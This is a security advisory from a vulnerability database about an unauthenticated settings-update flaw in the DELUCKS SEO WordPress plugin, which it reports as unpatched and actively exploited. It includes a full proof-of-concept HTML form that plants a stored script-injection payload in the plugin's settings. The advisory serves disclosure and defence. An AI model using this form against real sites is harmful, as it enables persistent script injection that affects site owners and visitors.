SB2019092503 - Unauthenticated options update in DELUCKS SEO plugin for WordPress

CSH
CYBERSECURITY HELP
Sign In REGISTER

Main Vulnerability Database SB2019092503

SB2019092503 - Unauthenticated options update in DELUCKS SEO plugin for WordPress

Published: September 25, 2019

Security Bulletin ID SB2019092503
Severity
High
Patch available
NO
Number of vulnerabilities 1
Exploitation vector Remote access
Highest impact Data manipulation

Breakdown by Severity

High 100%
  • Low
  • Medium
  • High
  • Critical

Description

This security bulletin contains information about 1 security vulnerability.


1) Improper access control (CVE-ID: N/A)

The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.

The vulnerability exists due to improper access restrictions in the "saveSettings()" function when processing data passed to the "/wp-admin/admin-post.php" URL. A remote non-authenticated attacker can bypass implemented security restrictions and execute arbitrary JavaScript code on the website.

Note: this vulnerability is being actively exploited in the wild.

PoC: 

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST">
<input type="hidden" name="dpc_save_settings" />
<input type="hidden" name="dpc[basic_metadata][dpc_status_basic_metadata]" value="1" />
<input type="hidden" name="dpc[basic_metadata][en][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][desc]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][google]" value='"><script>alert("XSS");</script>' />
<input type="hidden" name="dpc[basic_metadata][verify][bing]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][yandex]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][baidu]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][pinterest]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][alexa]" value="" />
<input type="hidden" name="dpc[basic_metadata][follow_texonomies]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][index_texonomies]" value="index" />
<input type="hidden" name="dpc[basic_metadata][follow_paginated]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][index_paginated]" value="index" />
<input type="hidden" name="dpc[basic_metadata][categories][1][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][categories][1][index]" value="index" />
<input type="hidden" name="dpc[basic_metadata][profiles][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][profiles][index]" value="index" />
<input type="hidden" name="dpc[basic_metadata][attachments][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][attachments][index]" value="index" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Remediation

Cybersecurity Help is not aware of any official remediation provided by the vendor.

References